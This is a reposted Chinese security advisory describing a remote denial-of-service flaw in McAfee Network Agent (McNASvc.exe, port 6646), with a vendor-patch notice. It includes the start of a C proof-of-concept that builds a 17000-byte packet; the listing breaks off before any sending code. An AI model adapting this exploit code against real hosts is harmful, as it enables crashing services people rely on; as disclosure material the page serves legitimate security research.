 |
McAfee Network Agent远程拒绝服务漏洞 |
|
|
| McAfee Network Agent远程拒绝服务漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:09:56 |
|
2006-10-23 10:23:58
发布日期:2006-10-13
更新日期:2006-10-16
受影响系统:McAfee Network Agent 1.0.178.0 描述:
BUGTRAQ ID: 20496
McAfee Network Agent是很多McAfee产品中所使用的一个网络服务。
McAfee Network Agent在处理畸形消息时存在漏洞,远程攻击者可能利用此漏洞对服务执行拒绝服务攻击。
McAfee Network Agent (McNASvc.exe)在处理字符串位置字段中包含有无效值的特制消息时存在漏洞。如果接受到了这样的消息的话,就可能导致服务崩溃。
<*来源:JAAScois (www.jaascois.com)
链接:http://secunia.com/advisories/22371/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Rated as : Critical risk
/////////////////////////////////////////////////////
// Mcafee Network Agent (mcnasvc.exe) Remote DoS
// By JAAScois [ http://www.jaascois.com ]
// Teston [ mcnasvc.exe ver1.0.178.0 ]
// Path [C:\Program Files\Common Files\McAfee\MNA]
// Port: [6646]
/////////////////////////////////////////////////////
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
int main (int argc, char *argv[]){
struct sockaddr_in tcp;
static SOCKET sock;
int ii=0;
unsigned char buf[17000];
WSADATA wsaData;
// packet
for(ii=0;ii<17000;ii++){
buf[ii]=0x90;
}
printf("[>>] Mcafee Network Agent (mcnasvc.exe ver 1.0.178.0)
Remote DoS
\n");
printf("[>>] By JAAScois [ http://www.jaascois.com ]
\n");
printf("[>>] +\n");
printf("[>>] +\n");
if(argc<2){
printf("[>>] Usage:%s 190.160.24.1\n",argv[0]);
return 1;
}
建议:
厂商补丁:
McAfee
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mcafee.com/
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: Clam Anti-Virus PE文件头处理堆溢出漏洞
下一篇文章: Call-Center-Software多个输入验证及信息泄露漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
